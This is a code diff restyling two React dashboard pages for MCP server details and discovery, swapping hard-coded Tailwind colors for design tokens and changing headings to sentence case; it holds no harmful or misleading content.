+                        <div className="absolute -inset-0.5 bg-bar rounded-lg opacity-20 group-hover:opacity-30 transition" />
+                        <div className="relative bg-glass border border-glass-border rounded-lg p-4 h-full">
                           <div className="flex items-center gap-2 mb-2">
-                            <div className="flex items-center justify-center w-8 h-8 rounded-md bg-blue-100 dark:bg-blue-900/30">
-                              <Bot className="h-4 w-4 text-blue-600 dark:text-blue-400" />
+                            <div className="flex items-center justify-center w-8 h-8 rounded-md bg-brand-soft">
+                              <Bot className="h-4 w-4 text-brand-text" />
                             </div>
                             <div>
-                              <span className="text-xs font-medium text-blue-600 dark:text-blue-400">Recommended</span>
-                              <h4 className="font-semibold text-sm">Agent Attestation</h4>
+                              <span className="text-xs font-medium text-brand-text">Recommended</span>
+                              <h4 className="font-semibold text-sm">Agent attestation</h4>
                             </div>
                           </div>
-                          <p className="text-xs text-muted-foreground mb-3">
+                          <p className="text-xs text-ink-secondary mb-3">
                             Agents automatically create cryptographically-signed attestations via the SDK.
                           </p>
-                          <div className="bg-blue-50 dark:bg-blue-950/50 border border-blue-200 dark:border-blue-800 rounded-md p-2 overflow-x-auto">
-                            <code className="text-xs text-blue-700 dark:text-blue-300 whitespace-nowrap font-mono">
-                              agent.attest_mcp("{server.name}")
+                          <div className="bg-glass-contrast border border-glass-contrast-border rounded-md p-2 overflow-x-auto">
+                            <code className="text-xs text-ink-code whitespace-nowrap font-mono">
+                              agent.attest_mcp("{server.id}")
                             </code>
                           </div>
                         </div>
@@ -940,30 +941,30 @@ export default function MCPServerDetailsPage({
 
                       {/* Option 2: Manual */}
                       <div className="relative group">
-                        <div className="absolute -inset-0.5 bg-gradient-to-r from-gray-400 to-gray-500 rounded-lg opacity-10 group-hover:opacity-20 transition" />
-                        <div className="relative bg-card border rounded-lg p-4 h-full">
+                        <div className="absolute -inset-0.5 bg-stroke rounded-lg opacity-10 group-hover:opacity-20 transition" />
+                        <div className="relative bg-glass border border-glass-border rounded-lg p-4 h-full">
                           <div className="flex items-center gap-2 mb-2">
-                            <div className="flex items-center justify-center w-8 h-8 rounded-md bg-gray-100 dark:bg-gray-800">
-                              <User className="h-4 w-4 text-gray-600 dark:text-gray-400" />
+                            <div className="flex items-center justify-center w-8 h-8 rounded-md bg-glass-inset-gray">
+                              <User className="h-4 w-4 text-ink-secondary" />
                             </div>
                             <div>
-                              <span className="text-xs font-medium text-muted-foreground">Alternative</span>
-                              <h4 className="font-semibold text-sm">Manual Attestation</h4>
+                              <span className="text-xs font-medium text-ink-secondary">Alternative</span>
+                              <h4 className="font-semibold text-sm">Manual attestation</h4>
                             </div>
                           </div>
-                          <p className="text-xs text-muted-foreground mb-3">
+                          <p className="text-xs text-ink-secondary mb-3">
                             {canManage
                               ? "Verify this server manually using the attestation form below."
                               : "Contact an admin or manager to manually verify this server."}
                           </p>
                           {canManage ? (
-                            <div className="flex items-center text-xs text-muted-foreground">
-                              <CheckCircle className="h-3.5 w-3.5 mr-1.5 text-green-500" />
+                            <div className="flex items-center text-xs text-ink-secondary">
+                              <CheckCircle className="h-3.5 w-3.5 mr-1.5 text-success-text" />
                               <span>You have permission to attest</span>
                             </div>
                           ) : (
-                            <div className="flex items-center text-xs text-muted-foreground">
-                              <AlertTriangle className="h-3.5 w-3.5 mr-1.5 text-amber-500" />
+                            <div className="flex items-center text-xs text-ink-secondary">
+                              <AlertTriangle className="h-3.5 w-3.5 mr-1.5 text-warning-text" />
                               <span>Requires admin/manager role</span>
                             </div>
                           )}
@@ -972,13 +973,13 @@ export default function MCPServerDetailsPage({
                     </div>
 
                     {/* Footer link */}
-                    <p className="text-xs text-center text-muted-foreground mt-5">
+                    <p className="text-xs text-center text-ink-secondary mt-5">
                       Learn more in the{" "}
                       <a
                         href="https://opena2a.org/docs/integration/python"
                         target="_blank"
                         rel="noopener noreferrer"
-                        className="text-blue-600 dark:text-blue-400 hover:underline"
+                        className="text-brand-text hover:underline"
                       >
                         SDK documentation
                       </a>
@@ -989,24 +990,24 @@ export default function MCPServerDetailsPage({
                     {attestations.map((attestation) => (
                       <div
                         key={attestation.id}
-                        className="border rounded-lg p-4 space-y-3"
+                        className="border border-divider rounded-lg p-4 space-y-3"
                       >
                         {/* Header */}
                         <div className="flex items-start justify-between gap-4">
                           <div className="flex items-center gap-3">
-                            <Bot className="h-5 w-5 text-blue-600" />
+                            <Bot className="h-5 w-5 text-brand-text" />
                             <div>
                               <p className="font-medium">
                                 {attestation.agentName}
                               </p>
-                              <p className="text-sm text-muted-foreground">
-                                Trust Score: {(attestation.agentTrustScore * 100).toFixed(0)}%
+                              <p className="text-sm text-ink-secondary">
+                                Trust score: {(attestation.agentTrustScore * 100).toFixed(0)}%
                               </p>
                             </div>
                           </div>
                           <div className="flex items-center gap-2">
                             {attestation.isValid ? (
-                              <Badge variant="default" className="bg-green-600">
+                              <Badge variant="success">
                                 <CheckCircle className="h-3 w-3 mr-1" />
                                 Valid
                               </Badge>
@@ -1017,7 +1018,7 @@ export default function MCPServerDetailsPage({
                               <Button
                                 variant="ghost"
                                 size="sm"
-                                className="h-7 px-2 text-red-600 hover:text-red-700 hover:bg-red-50"
+                                className="h-7 px-2 text-danger-text hover:bg-danger-fill hover:text-danger-text"
                                 onClick={() => openRevokeDialog(attestation)}
                               >
                                 <Ban className="h-3.5 w-3.5 mr-1" />
@@ -1030,14 +1031,14 @@ export default function MCPServerDetailsPage({
                         {/* Details */}
                         <div className="grid grid-cols-2 gap-4 text-sm">
                           <div>
-                            <span className="text-muted-foreground">Verified:</span>
+                            <span className="text-ink-secondary">Verified:</span>
                             <span className="ml-2">
                               {new Date(attestation.verifiedAt).toLocaleString()}
                             </span>
                           </div>
                           {attestation.connectionLatencyMs > 0 && (
                             <div>
-                              <span className="text-muted-foreground">Latency:</span>
+                              <span className="text-ink-secondary">Latency:</span>
                               <span className="ml-2">{attestation.connectionLatencyMs}ms</span>
                             </div>
                           )}
@@ -1048,7 +1049,7 @@ export default function MCPServerDetailsPage({
                           {attestation.healthCheckPassed && (
                             <Badge variant="outline" className="text-xs">
                               <CheckCircle className="h-3 w-3 mr-1" />
-                              Health Check Passed
+                              Health check passed
                             </Badge>
                           )}
                         </div>
@@ -1056,8 +1057,8 @@ export default function MCPServerDetailsPage({
                         {/* Capabilities */}
                         {attestation.capabilitiesConfirmed && attestation.capabilitiesConfirmed.length > 0 && (
                           <div>
-                            <p className="text-sm text-muted-foreground mb-2">
-                              Capabilities Verified ({attestation.capabilitiesConfirmed.length}):
+                            <p className="text-sm text-ink-secondary mb-2">
+                              Capabilities verified ({attestation.capabilitiesConfirmed.length}):
                             </p>
                             <div className="flex flex-wrap gap-1">
                               {attestation.capabilitiesConfirmed.map((cap, idx) => (
@@ -1095,7 +1096,7 @@ export default function MCPServerDetailsPage({
               <CardHeader>
                 <CardTitle className="flex items-center gap-2">
                   <Activity className="h-5 w-5" />
-                  Activity Timeline
+                  Activity timeline
                 </CardTitle>
                 <CardDescription>
                   Unified view of attestations, capability changes, and administrative actions
@@ -1111,9 +1112,9 @@ export default function MCPServerDetailsPage({
                   if (auditLogs.length === 0) {
                     return (
                       <div className="text-center py-12">
-                        <Activity className="h-12 w-12 text-muted-foreground mx-auto mb-4" />
-                        <p className="text-muted-foreground">No activity recorded yet</p>
-                        <p className="text-sm text-muted-foreground mt-2">
+                        <Activity className="h-12 w-12 text-ink-secondary mx-auto mb-4" />
+                        <p className="text-ink-secondary">No activity recorded yet</p>
+                        <p className="text-sm text-ink-secondary mt-2">
                           Events will appear here when agents interact with this MCP server
                         </p>
                       </div>
@@ -1124,24 +1125,24 @@ export default function MCPServerDetailsPage({
                     <div className="space-y-4">
                       {/* Summary Cards */}
                       <div className="grid grid-cols-3 gap-4 mb-6">
-                        <div className="p-3 rounded-lg border bg-card">
-                          <div className="flex items-center gap-2 text-muted-foreground text-xs mb-1">
-                            <CheckCircle className="h-3 w-3 text-green-500" />
+                        <div className="p-3 rounded-lg border border-glass-inset-border bg-glass-inset-gray">
+                          <div className="flex items-center gap-2 text-ink-secondary text-xs mb-1">
+                            <CheckCircle className="h-3 w-3 text-success-text" />
                             Attestations
                           </div>
                           <div className="text-2xl font-bold">{attestationCount}</div>
                         </div>
-                        <div className="p-3 rounded-lg border bg-card">
-                          <div className="flex items-center gap-2 text-muted-foreground text-xs mb-1">
-                            <Code2 className="h-3 w-3 text-purple-500" />
+                        <div className="p-3 rounded-lg border border-glass-inset-border bg-glass-inset-gray">
+                          <div className="flex items-center gap-2 text-ink-secondary text-xs mb-1">
+                            <Code2 className="h-3 w-3 text-brand-indigo" />
                             Capabilities
                           </div>
                           <div className="text-2xl font-bold">{capabilityCount}</div>
                         </div>
-                        <div className="p-3 rounded-lg border bg-card">
-                          <div className="flex items-center gap-2 text-muted-foreground text-xs mb-1">
-                            <FileText className="h-3 w-3 text-blue-500" />
-                            Admin Actions
+                        <div className="p-3 rounded-lg border border-glass-inset-border bg-glass-inset-gray">
+                          <div className="flex items-center gap-2 text-ink-secondary text-xs mb-1">
+                            <FileText className="h-3 w-3 text-brand-text" />
+                            Admin actions
                           </div>
                           <div className="text-2xl font-bold">{auditCount}</div>
                         </div>
@@ -1149,7 +1150,7 @@ export default function MCPServerDetailsPage({
 
                       {/* Timeline */}
                       <div className="relative">
-                        <div className="absolute left-4 top-0 bottom-0 w-0.5 bg-border" />
+                        <div className="absolute left-4 top-0 bottom-0 w-0.5 bg-divider" />
                         <div className="space-y-4">
                           {auditLogs.slice(0, auditPage * AUDIT_PAGE_SIZE).map((log, index) => {
                             const eventType = log.eventType || 'audit';
@@ -1208,25 +1209,25 @@ export default function MCPServerDetailsPage({
                             return (
                               <div key={log.id || index} className="relative pl-10">
                                 {/* Timeline dot */}
-                                <div className={`absolute left-2.5 w-3 h-3 rounded-full border-2 bg-background ${
-                                  eventType === 'attestation' ? 'border-green-500' :
-                                  eventType === 'capability' ? 'border-purple-500' :
-                                  'border-blue-500'
+                                <div className={`absolute left-2.5 w-3 h-3 rounded-full border-2 bg-page ${
+                                  eventType === 'attestation' ? 'border-success' :
+                                  eventType === 'capability' ? 'border-brand-indigo' :
+                                  'border-brand'
                                 }`} />
 
                                 {/* Event card */}
                                 <div className={`p-3 rounded-lg border ${
-                                  eventType === 'attestation' ? 'bg-green-50 dark:bg-green-950/20 border-green-200 dark:border-green-900' :
-                                  eventType === 'capability' ? 'bg-purple-50 dark:bg-purple-950/20 border-purple-200 dark:border-purple-900' :
-                                  'bg-card'
+                                  eventType === 'attestation' ? 'bg-success-fill border-success-border' :
+                                  eventType === 'capability' ? 'bg-brand-soft border-brand-soft' :
+                                  'bg-glass-inset-gray border-glass-inset-border'
                                 }`}>
                                   <div className="flex items-start justify-between gap-4">
                                     <div className="flex items-start gap-3">
                                       {/* Icon */}
                                       <div className={`mt-0.5 ${
-                                        eventType === 'attestation' ? 'text-green-500' :
-                                        eventType === 'capability' ? 'text-purple-500' :
-                                        'text-blue-500'
+                                        eventType === 'attestation' ? 'text-success-text' :
+                                        eventType === 'capability' ? 'text-brand-indigo' :
+                                        'text-brand-text'
                                       }`}>
                                         {eventType === 'attestation' && <CheckCircle className="h-4 w-4" />}
                                         {eventType === 'capability' && <Code2 className="h-4 w-4" />}
@@ -1234,7 +1235,7 @@ export default function MCPServerDetailsPage({
                                       </div>
                                       <div>
                                         <div className="font-medium text-sm">{details.title}</div>
-                                        <div className="text-sm text-muted-foreground">{details.description}</div>
+                                        <div className="text-sm text-ink-secondary">{details.description}</div>
 
                                         {/* Show capabilities confirmed for attestations */}
                                         {eventType === 'attestation' && metadata.capabilitiesConfirmed && metadata.capabilitiesConfirmed.length > 0 && (
@@ -1252,7 +1253,7 @@ export default function MCPServerDetailsPage({
                                           </div>
                                         )}
 
-                                        <div className="text-xs text-muted-foreground mt-1 flex items-center gap-1">
+                                        <div className="text-xs text-ink-secondary mt-1 flex items-center gap-1">
                                           <Clock className="h-3 w-3" />
                                           {log.timestamp ? new Date(log.timestamp).toLocaleString() : 'Unknown time'}
                                         </div>
@@ -1273,8 +1274,8 @@ export default function MCPServerDetailsPage({
 
                       {/* Pagination Controls */}
                       {auditLogs.length > 0 && (
-                        <div className="flex items-center justify-between pt-4 border-t mt-4">
-                          <div className="text-sm text-muted-foreground">
+                        <div className="flex items-center justify-between pt-4 border-t border-divider mt-4">
+                          <div className="text-sm text-ink-secondary">
                             Showing {Math.min(auditPage * AUDIT_PAGE_SIZE, auditLogs.length)} of {auditLogs.length} events
                           </div>
                           <div className="flex items-center gap-2">
@@ -1284,7 +1285,7 @@ export default function MCPServerDetailsPage({
                                 size="sm"
                                 onClick={() => setAuditPage(1)}
                               >
-                                Show Less
+                                Show less
                               </Button>
                             )}
                             {auditPage * AUDIT_PAGE_SIZE < auditLogs.length && (
@@ -1293,7 +1294,7 @@ export default function MCPServerDetailsPage({
                                 size="sm"
                                 onClick={() => setAuditPage(auditPage + 1)}
                               >
-                                Load More ({Math.min(AUDIT_PAGE_SIZE, auditLogs.length - auditPage * AUDIT_PAGE_SIZE)} more)
+                                Load more ({Math.min(AUDIT_PAGE_SIZE, auditLogs.length - auditPage * AUDIT_PAGE_SIZE)} more)
                               </Button>
                             )}
                           </div>
@@ -1309,7 +1310,7 @@ export default function MCPServerDetailsPage({
           <TabsContent value="details" className="space-y-4">
             <Card>
               <CardHeader>
-                <CardTitle>MCP Server Details</CardTitle>
+                <CardTitle>MCP server details</CardTitle>
                 <CardDescription>
                   Detailed information about this MCP server
                 </CardDescription>
@@ -1317,7 +1318,7 @@ export default function MCPServerDetailsPage({
               <CardContent>
                 <div className="grid gap-4">
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       Server ID:
                     </span>
                     <span className="col-span-2 text-sm font-mono">
@@ -1326,21 +1327,21 @@ export default function MCPServerDetailsPage({
                   </div>
                   <Separator />
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       Name:
                     </span>
                     <span className="col-span-2 text-sm">{server.name}</span>
                   </div>
                   <Separator />
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       URL:
                     </span>
                     <a
                       href={server.url}
                       target="_blank"
                       rel="noopener noreferrer"
-                      className="col-span-2 text-sm text-blue-600 hover:underline"
+                      className="col-span-2 text-sm text-brand-text hover:underline"
                     >
                       {server.url}
                     </a>
@@ -1349,7 +1350,7 @@ export default function MCPServerDetailsPage({
                   {server.description && (
                     <>
                       <div className="grid grid-cols-3 items-center gap-4">
-                        <span className="text-sm font-medium text-muted-foreground">
+                        <span className="text-sm font-medium text-ink-secondary">
                           Description:
                         </span>
                         <span className="col-span-2 text-sm">
@@ -1360,7 +1361,7 @@ export default function MCPServerDetailsPage({
                     </>
                   )}
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       Status:
                     </span>
                     <span className="col-span-2 text-sm">
@@ -1372,10 +1373,10 @@ export default function MCPServerDetailsPage({
                   </div>
                   <Separator />
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       {server.verificationMethod === "agent_attestation"
-                        ? "Confidence Score:"
-                        : "Trust Score:"}
+                        ? "Confidence score:"
+                        : "Trust score:"}
                     </span>
                     <span className="col-span-2 text-sm">
                       <Badge
@@ -1396,19 +1397,19 @@ export default function MCPServerDetailsPage({
                   {/* ✅ NEW: Attestation Info Card */}
                   {server.verificationMethod === "agent_attestation" && (
                     <>
-                      <div className="col-span-3 bg-blue-50 dark:bg-blue-900/10 border border-blue-200 dark:border-blue-800 rounded-lg p-4">
+                      <div className="col-span-3 bg-brand-soft border border-brand-soft rounded-lg p-4">
                         <div className="flex items-start gap-3">
-                          <Shield className="h-5 w-5 text-blue-600 dark:text-blue-400 mt-0.5" />
+                          <Shield className="h-5 w-5 text-brand-text mt-0.5" />
                           <div className="flex-1">
-                            <h4 className="text-sm font-semibold text-blue-900 dark:text-blue-100 mb-2">
-                              Verified by Agent Attestations
+                            <h4 className="text-sm font-semibold text-ink mb-2">
+                              Verified by agent attestations
                             </h4>
                             <div className="grid grid-cols-2 gap-3 text-sm">
                               <div>
-                                <span className="text-blue-700 dark:text-blue-300 font-medium">
+                                <span className="text-brand-text font-medium">
                                   {server.attestationCount || 0}
                                 </span>
-                                <span className="text-blue-600 dark:text-blue-400 ml-1">
+                                <span className="text-ink-body ml-1">
                                   {server.attestationCount === 1
                                     ? "attestation"
                                     : "attestations"}
@@ -1416,10 +1417,10 @@ export default function MCPServerDetailsPage({
                               </div>
                               {server.lastAttestedAt && (
                                 <div>
-                                  <span className="text-blue-700 dark:text-blue-300 font-medium">
+                                  <span className="text-brand-text font-medium">
                                     Last attested:
                                   </span>
-                                  <span className="text-blue-600 dark:text-blue-400 ml-1">
+                                  <span className="text-ink-body ml-1">
                                     {new Date(
                                       server.lastAttestedAt
                                     ).toLocaleDateString()}
@@ -1427,7 +1428,7 @@ export default function MCPServerDetailsPage({
                                 </div>
                               )}
                             </div>
-                            <p className="text-xs text-blue-600 dark:text-blue-400 mt-2">
+                            <p className="text-xs text-ink-secondary mt-2">
                               This MCP server's identity is cryptographically
                               verified by {server.attestationCount || 0} verified
                               agent{server.attestationCount !== 1 ? "s" : ""} with
@@ -1442,8 +1443,8 @@ export default function MCPServerDetailsPage({
                   {server.keyType && (
                     <>
                       <div className="grid grid-cols-3 items-center gap-4">
-                        <span className="text-sm font-medium text-muted-foreground">
-                          Key Type:
+                        <span className="text-sm font-medium text-ink-secondary">
+                          Key type:
                         </span>
                         <span className="col-span-2 text-sm">
                           {server.keyType}
@@ -1455,8 +1456,8 @@ export default function MCPServerDetailsPage({
                   {server.lastVerifiedAt && (
                     <>
                       <div className="grid grid-cols-3 items-center gap-4">
-                        <span className="text-sm font-medium text-muted-foreground">
-                          Last Verified:
+                        <span className="text-sm font-medium text-ink-secondary">
+                          Last verified:
                         </span>
                         <span className="col-span-2 text-sm">
                           {new Date(server.lastVerifiedAt).toLocaleString()}
@@ -1466,7 +1467,7 @@ export default function MCPServerDetailsPage({
                     </>
                   )}
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       Created:
                     </span>
                     <span className="col-span-2 text-sm">
@@ -1477,8 +1478,8 @@ export default function MCPServerDetailsPage({
                     <>
                       <Separator />
                       <div className="grid grid-cols-3 items-center gap-4">
-                        <span className="text-sm font-medium text-muted-foreground">
-                          Last Updated:
+                        <span className="text-sm font-medium text-ink-secondary">
+                          Last updated:
                         </span>
                         <span className="col-span-2 text-sm">
                           {new Date(server.updatedAt).toLocaleString()}
@@ -1488,7 +1489,7 @@ export default function MCPServerDetailsPage({
                   )}
                   <Separator />
                   <div className="grid grid-cols-3 items-center gap-4">
-                    <span className="text-sm font-medium text-muted-foreground">
+                    <span className="text-sm font-medium text-ink-secondary">
                       Organization ID:
                     </span>
                     <span className="col-span-2 text-sm font-mono">
@@ -1528,7 +1529,7 @@ export default function MCPServerDetailsPage({
         >
           <AlertDialogContent>
             <AlertDialogHeader>
-              <AlertDialogTitle>Delete MCP Server</AlertDialogTitle>
+              <AlertDialogTitle>Delete MCP server</AlertDialogTitle>
               <AlertDialogDescription>
                 This action cannot be undone. This will permanently delete the
                 server "{server?.name}".
@@ -1538,7 +1539,7 @@ export default function MCPServerDetailsPage({
               <AlertDialogCancel>Cancel</AlertDialogCancel>
               <AlertDialogAction
                 onClick={handleDelete}
-                className="bg-red-600 hover:bg-red-700"
+                className={buttonVariants({ variant: "destructive" })}
               >
                 Delete
               </AlertDialogAction>
@@ -1560,8 +1561,8 @@ export default function MCPServerDetailsPage({
           <AlertDialogContent>
             <AlertDialogHeader>
               <AlertDialogTitle className="flex items-center gap-2">
-                <Ban className="h-5 w-5 text-red-600" />
-                Revoke Attestation
+                <Ban className="h-5 w-5 text-danger-text" />
+                Revoke attestation
               </AlertDialogTitle>
               <AlertDialogDescription asChild>
                 <div className="space-y-4">
@@ -1574,8 +1575,8 @@ export default function MCPServerDetailsPage({
                   </p>
 
                   <div className="space-y-2">
-                    <label className="text-sm font-medium text-foreground">
-                      Reason for revocation <span className="text-red-500">*</span>
+                    <label className="text-sm font-medium text-ink">
+                      Reason for revocation <span className="text-danger-text">*</span>
                     </label>
                     <Select
                       value={revokeReason}
@@ -1587,31 +1588,31 @@ export default function MCPServerDetailsPage({
                       <SelectContent>
                         <SelectItem value="compromised">
                           <div className="flex items-center gap-2">
-                            <XCircle className="h-4 w-4 text-red-600" />
-                            <span>Compromised - Security concern detected</span>
+                            <XCircle className="h-4 w-4 text-danger-text" />
+                            <span>Compromised - security concern detected</span>
                           </div>
                         </SelectItem>
                         <SelectItem value="outdated">
                           <div className="flex items-center gap-2">
-                            <Activity className="h-4 w-4 text-yellow-600" />
-                            <span>Outdated - Server changed significantly</span>
+                            <Activity className="h-4 w-4 text-warning-text" />
+                            <span>Outdated - server changed significantly</span>
                           </div>
                         </SelectItem>
                         <SelectItem value="false_positive">
                           <div className="flex items-center gap-2">
-                            <AlertTriangle className="h-4 w-4 text-orange-600" />
-                            <span>False Positive - Incorrect attestation</span>
+                            <AlertTriangle className="h-4 w-4 text-warning-text" />
+                            <span>False positive - incorrect attestation</span>
                           </div>
                         </SelectItem>
                         <SelectItem value="policy_violation">
                           <div className="flex items-center gap-2">
-                            <Shield className="h-4 w-4 text-purple-600" />
-                            <span>Policy Violation - Does not meet requirements</span>
+                            <Shield className="h-4 w-4 text-brand-indigo" />
+                            <span>Policy violation - does not meet requirements</span>
                           </div>
                         </SelectItem>
                         <SelectItem value="other">
                           <div className="flex items-center gap-2">
-                            <Edit className="h-4 w-4 text-gray-600" />
+                            <Edit className="h-4 w-4 text-ink-secondary" />
                             <span>Other</span>
                           </div>
                         </SelectItem>
@@ -1620,19 +1621,19 @@ export default function MCPServerDetailsPage({
                   </div>
 
                   {selectedAttestation && (
-                    <div className="bg-muted rounded-lg p-3 space-y-1 text-sm">
+                    <div className="bg-glass-inset-gray rounded-lg p-3 space-y-1 text-sm">
                       <div className="flex justify-between">
-                        <span className="text-muted-foreground">Agent:</span>
+                        <span className="text-ink-secondary">Agent:</span>
                         <span className="font-medium">{selectedAttestation.agentName}</span>
                       </div>
                       <div className="flex justify-between">
-                        <span className="text-muted-foreground">Agent Trust:</span>
+                        <span className="text-ink-secondary">Agent trust:</span>
                         <span className="font-medium">
                           {(selectedAttestation.agentTrustScore * 100).toFixed(0)}%
                         </span>
                       </div>
                       <div className="flex justify-between">
-                        <span className="text-muted-foreground">Attested:</span>
+                        <span className="text-ink-secondary">Attested:</span>
                         <span className="font-medium">
                           {new Date(selectedAttestation.verifiedAt).toLocaleDateString()}
                         </span>
@@ -1657,7 +1658,7 @@ export default function MCPServerDetailsPage({
                 ) : (
                   <>
                     <Ban className="h-4 w-4 mr-2" />
-                    Revoke Attestation
+                    Revoke attestation
                   </>
                 )}
               </Button>

--- a/apps/web/app/dashboard/mcp/discovery/page.tsx
+++ b/apps/web/app/dashboard/mcp/discovery/page.tsx
@@ -111,8 +111,8 @@ export default function MCPDiscoveryPage() {
     return (
       <div className="flex items-center justify-center min-h-[400px]">
         <div className="flex flex-col items-center gap-2">
-          <Loader2 className="h-8 w-8 animate-spin text-blue-500" />
-          <span className="text-sm text-gray-500 dark:text-gray-400">
+          <Loader2 className="h-8 w-8 animate-spin text-brand" />
+          <span className="text-sm text-ink-secondary">
             Scanning for discovered MCP servers...
           </span>
         </div>
@@ -124,13 +124,13 @@ export default function MCPDiscoveryPage() {
     return (
       <div className="flex items-center justify-center min-h-[400px]">
         <div className="flex flex-col items-center gap-2">
-          <AlertCircle className="h-8 w-8 text-red-500" />
-          <span className="text-sm text-gray-500 dark:text-gray-400">
+          <AlertCircle className="h-8 w-8 text-danger" />
+          <span className="text-sm text-ink-secondary">
             {error}
           </span>
           <button
             onClick={fetchDiscoveryData}
-            className="mt-2 px-3 py-1 text-sm bg-blue-600 text-white rounded hover:bg-blue-700 flex items-center gap-1"
+            className="mt-2 px-3 py-1 text-sm bg-brand text-white rounded-pill shadow-glow hover:bg-brand-hover flex items-center gap-1 transition-colors"
           >
             <RefreshCw className="h-3 w-3" />
             Retry
@@ -145,16 +145,16 @@ export default function MCPDiscoveryPage() {
       {/* Header */}
       <div className="flex items-center justify-between">
         <div>
-          <h1 className="text-2xl font-bold text-gray-900 dark:text-gray-100">
-            MCP Discovery
+          <h1 className="text-2xl font-bold tracking-[-0.03em] text-ink">
+            MCP discovery
           </h1>
-          <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
+          <p className="text-sm text-ink-secondary mt-1">
             MCP servers detected through agent connections that may need registration
           </p>
         </div>
         <button
           onClick={fetchDiscoveryData}
-          className="flex items-center gap-2 px-4 py-2 text-sm bg-gray-100 dark:bg-gray-800 text-gray-700 dark:text-gray-300 rounded-lg hover:bg-gray-200 dark:hover:bg-gray-700 transition-colors"
+          className="flex items-center gap-2 px-4 py-2 text-sm bg-glass-inset-gray text-ink-body rounded-pill hover:bg-glass-inset transition-colors"
         >
           <RefreshCw className="h-4 w-4" />
           Refresh
@@ -163,65 +163,65 @@ export default function MCPDiscoveryPage() {
 
       {/* Stats Cards */}
       <div className="grid grid-cols-1 md:grid-cols-4 gap-4">
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4">
+        <div className="glass p-4">
           <div className="flex items-center justify-between">
             <div className="flex items-center gap-2">
-              <div className="p-2 bg-orange-100 dark:bg-orange-900/30 rounded-lg">
-                <AlertTriangle className="h-5 w-5 text-orange-600 dark:text-orange-400" />
+              <div className="p-2 bg-warning-fill rounded-inset-sm">
+                <AlertTriangle className="h-5 w-5 text-warning-text" />
               </div>
-              <span className="text-sm font-medium text-gray-600 dark:text-gray-400">
+              <span className="text-sm font-medium text-ink-secondary">
                 Unmapped MCPs
               </span>
             </div>
-            <span className="text-2xl font-bold text-orange-600 dark:text-orange-400">
+            <span className="text-2xl font-bold text-warning-text">
               {data?.totalUnmapped || 0}
             </span>
           </div>
         </div>
 
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4">
+        <div className="glass p-4">
           <div className="flex items-center justify-between">
             <div className="flex items-center gap-2">
-              <div className="p-2 bg-green-100 dark:bg-green-900/30 rounded-lg">
-                <Server className="h-5 w-5 text-green-600 dark:text-green-400" />
+              <div className="p-2 bg-success-fill rounded-inset-sm">
+                <Server className="h-5 w-5 text-success-text" />
               </div>
-              <span className="text-sm font-medium text-gray-600 dark:text-gray-400">
+              <span className="text-sm font-medium text-ink-secondary">
                 Registered
               </span>
             </div>
-            <span className="text-2xl font-bold text-green-600 dark:text-green-400">
+            <span className="text-2xl font-bold text-success-text">
               {data?.registeredServers || 0}
             </span>
           </div>
         </div>
 
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4">
+        <div className="glass p-4">
           <div className="flex items-center justify-between">
             <div className="flex items-center gap-2">
-              <div className="p-2 bg-blue-100 dark:bg-blue-900/30 rounded-lg">
-                <Bot className="h-5 w-5 text-blue-600 dark:text-blue-400" />
+              <div className="p-2 bg-brand-soft rounded-inset-sm">
+                <Bot className="h-5 w-5 text-brand-text" />
               </div>
-              <span className="text-sm font-medium text-gray-600 dark:text-gray-400">
-                Agents Scanned
+              <span className="text-sm font-medium text-ink-secondary">
+                Agents scanned
               </span>
             </div>
-            <span className="text-2xl font-bold text-blue-600 dark:text-blue-400">
+            <span className="text-2xl font-bold text-brand-text">
               {data?.totalAgents || 0}
             </span>
           </div>
         </div>
 
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4">
+        <div className="glass p-4">
           <div className="flex items-center justify-between">
             <div className="flex items-center gap-2">
-              <div className="p-2 bg-purple-100 dark:bg-purple-900/30 rounded-lg">
-                <Search className="h-5 w-5 text-purple-600 dark:text-purple-400" />
+              <div className="p-2 bg-glass-inset-gray rounded-inset-sm">
+                <Search className="h-5 w-5 text-ink-secondary" />
               </div>
-              <span className="text-sm font-medium text-gray-600 dark:text-gray-400">
-                Total Discovered
+              <span className="text-sm font-medium text-ink-secondary">
+                Total discovered
               </span>
             </div>
-            <span className="text-2xl font-bold text-purple-600 dark:text-purple-400">
+            <span className="text-2xl font-bold text-ink">
               {data?.discovered?.length || 0}
             </span>
           </div>
@@ -229,49 +229,49 @@ export default function MCPDiscoveryPage() {
       </div>
 
       {/* Filters */}
-      <div className="flex items-center gap-4 bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-4">
+      <div className="flex items-center gap-4 glass p-4">
         <div className="flex items-center gap-2">
-          <Search className="h-4 w-4 text-gray-400" />
+          <Search className="h-4 w-4 text-ink-tertiary" />
           <input
             type="text"
             placeholder="Search by name, URL, or agent..."
             value={searchQuery}
             onChange={(e) => setSearchQuery(e.target.value)}
-            className="bg-transparent border-none outline-none text-sm text-gray-900 dark:text-gray-100 placeholder-gray-500 w-64"
+            className="bg-transparent border-none outline-none text-sm text-ink placeholder:text-ink-tertiary w-64"
           />
         </div>
 
-        <div className="h-6 w-px bg-gray-200 dark:bg-gray-700" />
+        <div className="h-6 w-px bg-stroke" />
 
         <div className="flex items-center gap-2">
-          <span className="text-sm text-gray-500 dark:text-gray-400">Filter:</span>
